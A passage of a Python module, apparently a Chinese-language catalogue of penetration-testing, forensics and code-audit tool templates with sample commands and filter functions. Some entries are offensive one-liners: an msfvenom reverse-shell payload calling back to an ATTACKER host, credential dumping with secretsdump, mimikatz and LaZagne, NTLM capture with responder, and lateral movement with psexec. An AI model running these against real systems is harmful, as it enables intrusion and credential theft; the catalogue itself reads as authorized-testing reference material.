    },
    {
        "name": "wfuzz 子域", "type": "扫描器", "risk": "低",
        "description": "子域爆破。",
        "scenario": "子域发现",
        "dependencies": "wfuzz",
        "output_format": "文本",
        "commands": ["wfuzz -c -w subs.txt -H 'Host: FUZZ.target.com' https://target.com"],
        "params": "Host 头",
    },
    {
        "name": "nuclei 暴露面板", "type": "扫描器", "risk": "中",
        "description": "管理面板暴露检测。",
        "scenario": "暴露面发现",
        "dependencies": "nuclei",
        "output_format": "JSONL",
        "commands": ["nuclei -u https://target.com -t exposed-panels/ -t exposures/"],
        "params": "面板/暴露模板",
    },
    {
        "name": "nuclei 默认凭据", "type": "扫描器", "risk": "高",
        "description": "默认凭据检测（授权）。",
        "scenario": "授权弱口令检测",
        "dependencies": "nuclei",
        "output_format": "JSONL",
        "commands": ["nuclei -u https://target.com -t default-logins/"],
        "params": "仅授权",
    },
    {
        "name": "metasploit auxiliary 扫描", "type": "扫描器", "risk": "中",
        "description": "MSF 辅助扫描模块。",
        "scenario": "授权扫描",
        "dependencies": "metasploit",
        "output_format": "控制台",
        "commands": [
            "use auxiliary/scanner/http/http_version",
            "use auxiliary/scanner/ssh/ssh_version",
            "run RHOSTS=192.168.1.0/24",
        ],
        "params": "RHOSTS",
    },
    {
        "name": "searchsploit", "type": "漏洞利用", "risk": "中",
        "description": "Exploit-DB 本地搜索。",
        "scenario": "漏洞匹配",
        "dependencies": "exploitdb",
        "output_format": "文本",
        "commands": [
            "searchsploit apache 2.4.49",
            "searchsploit CVE-2021-44228",
        ],
        "params": "关键字/CVE",
    },
    {
        "name": "msfvenom", "type": "漏洞利用", "risk": "高",
        "description": "Payload 生成（仅授权）。",
        "scenario": "授权后渗透",
        "dependencies": "metasploit",
        "output_format": "二进制",
        "commands": [
            "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=443 -f exe -o shell.exe",
        ],
        "params": "仅授权；勿用于未授权目标",
    },
    {
        "name": " responder 强制 NTLM", "type": "协议分析", "risk": "高",
        "description": "强制 NTLM 认证收集。",
        "scenario": "授权内网",
        "dependencies": "responder",
        "output_format": "文本",
        "commands": ["responder -I eth0 --force-WPAD"],
        "params": "仅授权",
    },
    {
        "name": "evil-winrm", "type": "漏洞利用", "risk": "高",
        "description": "WinRM 交互式 shell（授权）。",
        "scenario": "授权 Windows 管理",
        "dependencies": "evil-winrm",
        "output_format": "shell",
        "commands": [
            "evil-winrm -i 192.168.1.10 -u admin -p pass",
        ],
        "params": "仅授权",
    },
    {
        "name": "crackmapexec SMB", "type": "扫描器", "risk": "高",
        "description": "SMB 批量枚举。",
        "scenario": "授权内网",
        "dependencies": "netexec",
        "output_format": "文本",
        "commands": ["nxc smb 192.168.1.0/24 -u user -p pass"],
        "params": "仅授权",
    },
    {
        "name": "impacket-secretsdump", "type": "取证分析", "risk": "高",
        "description": "SAM/LSADUMP/NTDS 提取（授权）。",
        "scenario": "授权取证",
        "dependencies": "impacket",
        "output_format": "哈希",
        "commands": [
            "impacket-secretsdump target.local/admin:pass@192.168.1.10",
        ],
        "params": "仅授权",
    },
    {
        "name": "impacket-psexec", "type": "漏洞利用", "risk": "高",
        "description": "psexec 风格执行（授权）。",
        "scenario": "授权横向",
        "dependencies": "impacket",
        "output_format": "shell",
        "commands": [
            "impacket-psexec domain/admin:pass@192.168.1.10",
        ],
        "params": "仅授权",
    },
    {
        "name": "impacket-smbexec", "type": "漏洞利用", "risk": "高",
        "description": "smbexec 风格执行。",
        "scenario": "授权横向",
        "dependencies": "impacket",
        "output_format": "shell",
        "commands": ["impacket-smbexec domain/admin:pass@192.168.1.10"],
        "params": "仅授权",
    },
    {
        "name": "impacket-mssqlclient", "type": "漏洞利用", "risk": "中",
        "description": "MSSQL 客户端。",
        "scenario": "数据库授权访问",
        "dependencies": "impacket",
        "output_format": "shell",
        "commands": ["impacket-mssqlclient sa:pass@192.168.1.10"],
        "params": "授权",
    },
    {
        "name": "impacket-ticketer", "type": "漏洞利用", "risk": "高",
        "description": "Kerberos 票据构造（授权）。",
        "scenario": "授权域评估",
        "dependencies": "impacket",
        "output_format": "票据",
        "commands": ["impacket-ticketer -nthash HEX -domain-sid S-1-5-21-... -domain target.local admin"],
        "params": "仅授权",
    },
    {
        "name": "Rubeus", "type": "漏洞利用", "risk": "高",
        "description": "Windows Kerberos 工具（授权）。",
        "scenario": "授权域评估",
        "dependencies": "Rubeus.exe",
        "output_format": "文本",
        "commands": ["Rubeus.exe kerberoast /outfile:hashes.txt"],
        "params": "仅授权",
    },
    {
        "name": "Certify", "type": "漏洞利用", "risk": "高",
        "description": "AD CS 证书服务评估（授权）。",
        "scenario": "授权域评估",
        "dependencies": "Certify.exe",
        "output_format": "文本",
        "commands": ["Certify.exe find /vulnerable"],
        "params": "仅授权",
    },
    {
        "name": "mimikatz LSADUMP", "type": "取证分析", "risk": "高",
        "description": "LSA 密钥提取。",
        "scenario": "授权取证",
        "dependencies": "mimikatz",
        "output_format": "文本",
        "commands": ["lsadump::secrets", "lsadump::cache"],
        "params": "仅授权",
    },
    {
        "name": "LaZagne", "type": "取证分析", "risk": "中",
        "description": "多平台凭据恢复。",
        "scenario": "授权取证",
        "dependencies": "lazagne",
        "output_format": "文本",
        "commands": ["lazagne.exe all"],
        "params": "仅授权",
    },
    {
        "name": "WinPEAS", "type": "扫描器", "risk": "中",
        "description": "Windows 本地提权枚举。",
        "scenario": "授权后渗透",
        "dependencies": "winpeas.exe",
        "output_format": "彩色报告",
        "commands": ["winpeas.exe"],
        "params": "仅授权",
    },
    {
        "name": "LinPEAS", "type": "扫描器", "risk": "中",
        "description": "Linux 本地提权枚举。",
        "scenario": "授权后渗透",
        "dependencies": "linpeas.sh",
        "output_format": "彩色报告",
        "commands": ["./linpeas.sh"],
        "params": "仅授权",
    },
    {
        "name": "pspy", "type": "取证分析", "risk": "低",
        "description": "无 root 监控 Linux 进程。",
        "scenario": "授权主机监控",
        "dependencies": "pspy",
        "output_format": "控制台",
        "commands": ["./pspy64"],
        "params": "监控计划任务/进程",
    },
    {
        "name": "FlareVM 工具集", "type": "逆向工程", "risk": "低",
        "description": "Windows 逆向分析工具合集。",
        "scenario": "逆向环境",
        "dependencies": "flarevm",
        "output_format": "环境",
        "commands": ["# 安装后获得 x64dbg/IDA 社区版等"],
        "params": "分析机",
    },
    {
        "name": "x64dbg", "type": "逆向工程", "risk": "中",
        "description": "Windows 用户态调试器。",
        "scenario": "动态调试恶意样本",
        "dependencies": "x64dbg",
        "output_format": "调试",
        "commands": ["# GUI 动态调试"],
        "params": "断点/跟踪",
    },
    {
        "name": "IDA Pro 社区版", "type": "逆向工程", "risk": "中",
        "description": "交互式反汇编器。",
        "scenario": "静态逆向",
        "dependencies": "ida",
        "output_format": "反汇编",
        "commands": ["# 加载二进制后按 F5 反编译"],
        "params": "反编译/脚本",
    },
    {
        "name": "Ghidra Headless", "type": "逆向工程", "risk": "低",
        "description": "Ghidra 无头批量分析。",
        "scenario": "批量二进制分析",
        "dependencies": "ghidra",
        "output_format": "脚本导出",
        "commands": [
            "analyzeHeadless /proj myProj -import ./sample.exe -postScript ExportDecompile.java",
        ],
        "params": "无头模式",
    },
    {
        "name": "strings", "type": "逆向工程", "risk": "低",
        "description": "二进制字符串提取。",
        "scenario": "快速 IOC 提取",
        "dependencies": "binutils",
        "output_format": "文本",
        "commands": [
            "strings -a sample.exe | grep -i http",
            "strings -e l sample.exe",
        ],
        "params": "-e l 16位LE",
    },
    {
        "name": "objdump", "type": "逆向工程", "risk": "低",
        "description": "目标文件反汇编。",
        "scenario": "汇编查看",
        "dependencies": "binutils",
        "output_format": "汇编",
        "commands": [
            "objdump -d -M intel ./binary",
            "objdump -h ./binary",
        ],
        "params": "-d 反汇编；-h 段表",
    },
    {
        "name": "readelf", "type": "逆向工程", "risk": "低",
        "description": "ELF 文件查看。",
        "scenario": "ELF 分析",
        "dependencies": "binutils",
        "output_format": "文本",
        "commands": [
            "readelf -a ./binary",
            "readelf -l ./binary",
        ],
        "params": "-a 全部；-l 程序头",
    },
    {
        "name": "file", "type": "取证分析", "risk": "低",
        "description": "文件类型识别。",
        "scenario": "文件分类",
        "dependencies": "file",
        "output_format": "文本",
        "commands": ["file ./sample"],
        "params": "magic number",
    },
    {
        "name": "sha256sum", "type": "取证分析", "risk": "低",
        "description": "文件哈希计算。",
        "scenario": "证据完整性",
        "dependencies": "coreutils",
        "output_format": "哈希",
        "commands": ["sha256sum ./evidence.bin"],
        "params": "证据哈希链",
    },
    {
        "name": "Autopsy 模块", "type": "取证分析", "risk": "低",
        "description": "近期文件/Picture 解析。",
        "scenario": "磁盘取证",
        "dependencies": "autopsy",
        "output_format": "报告",
        "commands": ["# 配置 Recent Files/Embedded Files 解析器"],
        "params": "模块",
    },
    {
        "name": "The Sleuth Kit (tsk)", "type": "取证分析", "risk": "低",
        "description": "磁盘镜像命令行取证。",
        "scenario": "命令行取证",
        "dependencies": "sleuthkit",
        "output_format": "文本",
        "commands": [
            "fls -r image.dd",
            "icat image.dd inode",
        ],
        "params": "fls 列表；icat 提取",
    },
    {
        "name": "RegRipper", "type": "取证分析", "risk": "低",
        "description": "Windows 注册表 hive 分析。",
        "scenario": "注册表取证",
        "dependencies": "regripper",
        "output_format": "文本",
        "commands": ["rip.pl -p all -f NTUSER.DAT"],
        "params": "插件",
    },
    {
        "name": "MFTECmd", "type": "取证分析", "risk": "低",
        "description": "MFT 解析。",
        "scenario": "文件时间线",
        "dependencies": "MFTECmd",
        "output_format": "CSV",
        "commands": ["MFTECmd.exe -f C:\\$MFT --csv out\\"],
        "params": "MFT 解析",
    },
    {
        "name": "plaso / log2timeline", "type": "取证分析", "risk": "低",
        "description": "时间线生成。",
        "scenario": "事件时间线",
        "dependencies": "plaso",
        "output_format": "storage",
        "commands": [
            "log2timeline.py timeline.plaso image.dd",
            "psort.py -z Asia/Shanghai timeline.plaso",
        ],
        "params": "时间线",
    },
    {
        "name": "volatility3 插件", "type": "取证分析", "risk": "低",
        "description": "内存插件扩展。",
        "scenario": "内存取证",
        "dependencies": "volatility3",
        "output_format": "文本",
        "commands": [
            "vol -f mem.dmp windows.handles",
            "vol -f mem.dmp windows.callbacks",
        ],
        "params": "插件",
    },
    {
        "name": "Yara 规则编写", "type": "逆向工程", "risk": "低",
        "description": "自定义检测规则。",
        "scenario": "威胁狩猎",
        "dependencies": "yara",
        "output_format": "规则",
        "commands": [
            "rule Example { strings: $a = \"MZ\" condition: $a at 0 }",
        ],
        "params": "规则语法",
    },
    {
        "name": "Sigma 规则", "type": "扫描器", "risk": "低",
        "description": "通用 SIEM 检测规则。",
        "scenario": "检测工程",
        "dependencies": "sigma",
        "output_format": "SIEM 查询",
        "commands": [
            "sigma convert -t splunk rules/windows/",
        ],
        "params": "跨 SIEM",
    },
    {
        "name": "Atomic Red Team", "type": "扫描器", "risk": "中",
        "description": "ATT&CK 原子测试用例。",
        "scenario": "检测有效性验证",
        "dependencies": "atomic-red-team",
        "output_format": "执行",
        "commands": [
            "Invoke-AtomicTest T1059.001",
        ],
        "params": "验证检测",
    },
    {
        "name": "Caldera", "type": "漏洞利用", "risk": "中",
        "description": "对手模拟自动化平台。",
        "scenario": "红队自动化",
        "dependencies": "caldera",
        "output_format": "报告",
        "commands": ["# 通过 Web 界面编排能力与事件"],
        "params": "仅授权",
    },
    {
        "name": "InSpec", "type": "扫描器", "risk": "低",
        "description": "基础设施合规即代码。",
        "scenario": "自动化合规检查",
        "dependencies": "inspec",
        "output_format": "报告",
        "commands": [
            "inspec exec linux-baseline -t ssh://target",
        ],
        "params": "合规 profile",
    },
    {
        "name": "OpenSCAP 报告", "type": "扫描器", "risk": "低",
        "description": "SCAP 报告生成。",
        "scenario": "合规报告",
        "dependencies": "openscap",
        "output_format": "HTML",
        "commands": ["oscap xccdf generate report result.xml -o report.html"],
        "params": "报告",
    },
    {
        "name": "Snyk", "type": "代码审计", "risk": "低",
        "description": "依赖与代码漏洞扫描。",
        "scenario": "SCA",
        "dependencies": "snyk-cli",
        "output_format": "JSON",
        "commands": [
            "snyk test",
            "snyk code test",
        ],
        "params": "test/code",
    },
    {
        "name": "npm audit", "type": "代码审计", "risk": "低",
        "description": "Node 依赖审计。",
        "scenario": "Node 项目",
        "dependencies": "npm",
        "output_format": "文本",
        "commands": ["npm audit", "npm audit fix"],
        "params": "依赖审计",
    },
    {
        "name": "pip-audit", "type": "代码审计", "risk": "低",
        "description": "Python 依赖审计。",
        "scenario": "Python 项目",
        "dependencies": "pip-audit",
        "output_format": "JSON",
        "commands": ["pip-audit", "pip-audit -r requirements.txt"],
        "params": "依赖",
    },
    {
        "name": "osv-scanner", "type": "代码审计", "risk": "低",
        "description": "Google OSV 漏洞库扫描。",
        "scenario": "SCA",
        "dependencies": "osv-scanner",
        "output_format": "JSON",
        "commands": ["osv-scanner -r ."],
        "params": "递归",
    },
    {
        "name": "Checkov", "type": "代码审计", "risk": "低",
        "description": "IaC 安全扫描。",
        "scenario": "Terraform/CloudFormation",
        "dependencies": "checkov",
        "output_format": "JSON",
        "commands": ["checkov -d . --framework terraform"],
        "params": "IaC",
    },
    {
        "name": "tfsec", "type": "代码审计", "risk": "低",
        "description": "Terraform 安全扫描。",
        "scenario": "IaC",
        "dependencies": "tfsec",
        "output_format": "JSON",
        "commands": ["tfsec . --format json"],
        "params": "Terraform",
    },
    {
        "name": "kubesec", "type": "容器扫描", "risk": "低",
        "description": "K8s 资源安全评分。",
        "scenario": "K8s manifest 评审",
        "dependencies": "kubesec",
        "output_format": "JSON",
        "commands": ["kubesec scan deployment.yaml"],
        "params": "评分",
    },
    {
        "name": "kube-linter", "type": "容器扫描", "risk": "低",
        "description": "K8s manifest lint。",
        "scenario": "K8s 最佳实践",
        "dependencies": "kube-linter",
        "output_format": "文本",
        "commands": ["kube-linter lint chart/"],
        "params": "lint",
    },
    {
        "name": "Popeye", "type": "容器扫描", "risk": "低",
        "description": "K8s 集群资源卫生检查。",
        "scenario": "集群审计",
        "dependencies": "popeye",
        "output_format": "文本",
        "commands": ["popeye"],
        "params": "集群",
    },
    {
        "name": "Terrascan", "type": "代码审计", "risk": "低",
        "description": "IaC 违规检测。",
        "scenario": "IaC",
        "dependencies": "terrascan",
        "output_format": "JSON",
        "commands": ["terrascan scan -i terraform -d ."],
        "params": "IaC",
    },
    {
        "name": "Hadolint", "type": "代码审计", "risk": "低",
        "description": "Dockerfile lint。",
        "scenario": "容器镜像构建",
        "dependencies": "hadolint",
        "output_format": "文本",
        "commands": ["hadolint Dockerfile"],
        "params": "Dockerfile",
    },
    {
        "name": "Dagda", "type": "容器扫描", "risk": "低",
        "description": "容器镜像分析。",
        "scenario": "镜像扫描",
        "dependencies": "dagda",
        "output_format": "JSON",
        "commands": ["dagda-cli check --image nginx:1.21"],
        "params": "镜像",
    },
    {
        "name": "Clair", "type": "容器扫描", "risk": "低",
        "description": "容器镜像静态分析。",
        "scenario": "镜像仓库扫描",
        "dependencies": "clair",
        "output_format": "JSON",
        "commands": ["# 运行 clair-scanner 推送镜像层"],
        "params": "层分析",
    },
    {
        "name": "Grype", "type": "容器扫描", "risk": "低",
        "description": "镜像与文件系统漏洞扫描。",
        "scenario": "镜像/SBOM",
        "dependencies": "grype",
        "output_format": "JSON/Table",
        "commands": [
            "grype nginx:1.21",
            "grype dir:. --fail-on high",
        ],
        "params": "镜像/目录",
    },
    {
        "name": "syft", "type": "容器扫描", "risk": "低",
        "description": "生成 SBOM。",
        "scenario": "软件物料清单",
        "dependencies": "syft",
        "output_format": "SPDX/CycloneDX",
        "commands": [
            "syft nginx:1.21 -o spdx-json",
            "syft dir:. -o cyclonedx-json",
        ],
        "params": "SBOM 格式",
    },
    {
        "name": "Docker Bench", "type": "容器扫描", "risk": "低",
        "description": "Docker CIS 基线检查。",
        "scenario": "Docker 主机加固",
        "dependencies": "docker-bench-security",
        "output_format": "报告",
        "commands": ["docker-bench-security"],
        "params": "基线",
    },
    {
        "name": "Falco", "type": "容器扫描", "risk": "低",
        "description": "运行时威胁检测。",
        "scenario": "容器运行时监控",
        "dependencies": "falco",
        "output_format": "告警",
        "commands": ["falco -r /etc/falco/falco_rules.yaml"],
        "params": "运行时规则",
    },
    {
        "name": "Tetragon", "type": "容器扫描", "risk": "低",
        "description": "eBPF 运行时可观测。",
        "scenario": "运行时检测",
        "dependencies": "tetragon",
        "output_format": "事件流",
        "commands": ["kubectl exec -it -n kube-system ds/tetragon -- tetra getevents"],
        "params": "eBPF",
    },
    {
        "name": "bpftool", "type": "协议分析", "risk": "低",
        "description": "eBPF 程序查看。",
        "scenario": "内核可观测",
        "dependencies": "linux-tools",
        "output_format": "文本",
        "commands": ["bpftool prog show"],
        "params": "eBPF",
    },
    {
        "name": "tcpdump BPF", "type": "协议分析", "risk": "低",
        "description": "BPF 过滤语法。",
        "scenario": "抓包过滤",
        "dependencies": "tcpdump",
        "output_format": "pcap",
        "commands": [
            "tcpdump -i any 'tcp port 443 and host 1.2.3.4'",
        ],
        "params": "BPF",
    },
    {
        "name": "mitmproxy", "type": "协议分析", "risk": "中",
        "description": "交互式 HTTP 代理。",
        "scenario": "App/Web 流量分析",
        "dependencies": "mitmproxy",
        "output_format": "交互/flows",
        "commands": [
            "mitmproxy -p 8080",
            "mitmdump -w flows.mitm",
        ],
        "params": "透明/反向代理",
    },
    {
        "name": "Burp Autorize", "type": "漏洞利用", "risk": "高",
        "description": "越权检测插件。",
        "scenario": "授权越权测试",
        "dependencies": "burp",
        "output_format": "插件",
        "commands": ["# 配置两个用户 Cookie 后对比响应"],
        "params": "BOLA/越权",
    },
    {
        "name": "sqlmap WAF 检测", "type": "漏洞利用", "risk": "高",
        "description": "WAF 识别。",
        "scenario": "授权测试",
        "dependencies": "sqlmap",
        "output_format": "文本",
        "commands": ["sqlmap -u URL --identify-waf"],
        "params": "WAF",
    },
    {
        "name": "nmap NSE 脚本", "type": "扫描器", "risk": "中",
        "description": "NSE 漏洞脚本。",
        "scenario": "授权扫描",
        "dependencies": "nmap",
        "output_format": "文本",
        "commands": [
            "nmap --script=http-vuln-cve2021-41773 target.com",
        ],
        "params": "NSE",
    },
    {
        "name": "masscan + nmap 联动", "type": "扫描器", "risk": "中",
        "description": "大规模粗扫后细扫。",
        "scenario": "资产服务识别",
        "dependencies": "masscan,nmap",
        "output_format": "文本",
        "commands": [
            "masscan 10.0.0.0/8 -p80,443 --rate=10000 -oL out.txt",
            "# 再对存活主机 nmap -sV",
        ],
        "params": "联动",
    },
    {
        "name": "Naabu", "type": "扫描器", "risk": "低",
        "description": "端口扫描。",
        "scenario": "资产发现",
        "dependencies": "naabu",
        "output_format": "JSON",
        "commands": [
            "naabu -host target.com",
            "naabu -list hosts.txt -json",
        ],
        "params": "端口",
    },
    {
        "name": "httpx", "type": "扫描器", "risk": "低",
        "description": "Web 探测与指纹。",
        "scenario": "存活 Web 服务识别",
        "dependencies": "httpx",
        "output_format": "JSON",
        "commands": [
            "httpx -l urls.txt -title -tech-detect",
            "httpx -u https://target.com -json",
        ],
        "params": "指纹/标题",
    },
    {
        "name": "katana", "type": "扫描器", "risk": "低",
        "description": "现代爬虫。",
        "scenario": "Web 爬取",
        "dependencies": "katana",
        "output_format": "URL 列表",
        "commands": [
            "katana -u https://target.com",
            "katana -u https://target.com -d 5",
        ],
        "params": "深度",
    },
    {
        "name": "gau", "type": "扫描器", "risk": "低",
        "description": "已知 URL 获取。",
        "scenario": "历史 URL",
        "dependencies": "gau",
        "output_format": "文本",
        "commands": ["gau target.com"],
        "params": "Wayback",
    },
    {
        "name": "waybackurls", "type": "扫描器", "risk": "低",
        "description": "Wayback URL 枚举。",
        "scenario": "历史资产",
        "dependencies": "waybackurls",
        "output_format": "文本",
        "commands": ["echo target.com | waybackurls"],
        "params": "Wayback",
    },
    {
        "name": "Gospider", "type": "扫描器", "risk": "低",
        "description": "快速爬虫。",
        "scenario": "端点发现",
        "dependencies": "gospider",
        "output_format": "文本",
        "commands": ["gospider -s https://target.com -d 3"],
        "params": "爬虫",
    },
    {
        "name": "Arjun", "type": "扫描器", "risk": "低",
        "description": "HTTP 参数发现。",
        "scenario": "隐藏参数",
        "dependencies": "arjun",
        "output_format": "JSON",
        "commands": ["arjun -u https://target.com/api"],
        "params": "参数",
    },
    {
        "name": "ParamSpider", "type": "扫描器", "risk": "低",
        "description": "参数挖掘。",
        "scenario": "参数发现",
        "dependencies": "paramspider",
        "output_format": "文本",
        "commands": ["python3 paramspider.py --domain target.com"],
        "params": "参数",
    },
    {
        "name": "kxss", "type": "扫描器", "risk": "低",
        "description": "反射点发现。",
        "scenario": "XSS 侦察",
        "dependencies": "kxss",
        "output_format": "文本",
        "commands": ["gau target.com | kxss"],
        "params": "反射",
    },
    {
        "name": "dalfox", "type": "漏洞利用", "risk": "高",
        "description": "XSS 扫描。",
        "scenario": "授权 XSS 测试",
        "dependencies": "dalfox",
        "output_format": "JSON",
        "commands": [
            "dalfox url https://target.com/?q=test",
        ],
        "params": "仅授权",
    },
    {
        "name": "Gxss", "type": "扫描器", "risk": "低",
        "description": "反射点探测。",
        "scenario": "XSS 侦察",
        "dependencies": "gxss",
        "output_format": "文本",
        "commands": ["gau target.com | Gxss"],
        "params": "反射",
    },
    {
        "name": "qsreplace", "type": "扫描器", "risk": "低",
        "description": "URL 参数替换。",
        "scenario": "管道处理",
        "dependencies": "qsreplace",
        "output_format": "URL",
        "commands": ["gau target.com | qsreplace 'test' | dalfox stdin"],
        "params": "替换",
    },
    {
        "name": "unfurl", "type": "扫描器", "risk": "低",
        "description": "URL 提取字段。",
        "scenario": "URL 处理",
        "dependencies": "unfurl",
        "output_format": "文本",
        "commands": ["echo https://target.com/path | unfurl keys"],
        "params": "解析",
    },
    {
        "name": "anew", "type": "扫描器", "risk": "低",
        "description": "去重追加。",
        "scenario": "管线去重",
        "dependencies": "anew",
        "output_format": "文本",
        "commands": ["subfinder -d target.com | anew subs.txt"],
        "params": "去重",
    },
    {
        "name": "notify", "type": "扫描器", "risk": "低",
        "description": "结果通知。",
        "scenario": "扫描告警",
        "dependencies": "notify",
        "output_format": "推送",
        "commands": ["nuclei -u target.com | notify"],
        "params": "通知",
    },
    {
        "name": "interactsh", "type": "扫描器", "risk": "中",
        "description": "带外(OOB)检测。",
        "scenario": "SSRF/盲注 OOB",
        "dependencies": "interactsh-client",
        "output_format": "DNS/HTTP 日志",
        "commands": ["interactsh-client"],
        "params": "OOB",
    },
    {
        "name": "cdncheck", "type": "扫描器", "risk": "低",
        "description": "CDN 识别。",
        "scenario": "资产识别",
        "dependencies": "cdncheck",
        "output_format": "JSON",
        "commands": ["echo target.com | cdncheck"],
        "params": "CDN",
    },
    {
        "name": "asnmap", "type": "扫描器", "risk": "低",
        "description": "ASN 网段映射。",
        "scenario": "组织资产",
        "dependencies": "asnmap",
        "output_format": "文本",
        "commands": ["asnmap -d target.com"],
        "params": "ASN",
    },
    {
        "name": "mapcidr", "type": "扫描器", "risk": "低",
        "description": "CIDR 处理。",
        "scenario": "网段整理",
        "dependencies": "mapcidr",
        "output_format": "文本",
        "commands": ["mapcidr -cidr 1.0.0.0/24 -aggregate"],
        "params": "CIDR",
    },
    {
        "name": "ipinfo", "type": "扫描器", "risk": "低",
        "description": "IP 归属查询。",
        "scenario": "资产归属",
        "dependencies": "curl",
        "output_format": "JSON",
        "commands": ["curl -s ipinfo.io/1.1.1.1"],
        "params": "IP",
    },
]


TOOL_TEMPLATES: list[dict] = _CURATED

# 去重（按 name）
_seen = set()
DEDUPED: list[dict] = []
for _t in _CURATED:
    if _t["name"] in _seen:
        continue
    _seen.add(_t["name"])
    DEDUPED.append(_t)
TOOL_TEMPLATES = DEDUPED


def get_all() -> list[dict]:
    return TOOL_TEMPLATES


def filter_tools(ttype: str | None = None,
                 risk: str | None = None,
                 keyword: str | None = None,
                 limit: int = 0,
                 offset: int = 0) -> dict:
    rows = TOOL_TEMPLATES
    if ttype:
        rows = [r for r in rows if r["type"] == ttype]
    if risk:
        rows = [r for r in rows if r["risk"] == risk]
    if keyword:
        kw = keyword.lower()
        rows = [r for r in rows if kw in r["name"].lower()
                or kw in r["description"].lower()
                or any(kw in c.lower() for c in r["commands"])]
    total = len(rows)
    if offset:
        rows = rows[offset:]
    if limit:
        rows = rows[:limit]
    return {"items": rows, "total": total, "offset": offset, "limit": limit}


def stats() -> dict:
    by_type: dict[str, int] = {}
    by_risk: dict[str, int] = {}
    for t in TOOL_TEMPLATES:
        by_type[t["type"]] = by_type.get(t["type"], 0) + 1
        by_risk[t["risk"]] = by_risk.get(t["risk"], 0) + 1
    return {"total": len(TOOL_TEMPLATES), "by_type": by_type,
            "by_risk": by_risk, "types": TOOL_TYPES, "risks": RISK_LEVELS}


if __name__ == "__main__":
    print(stats())
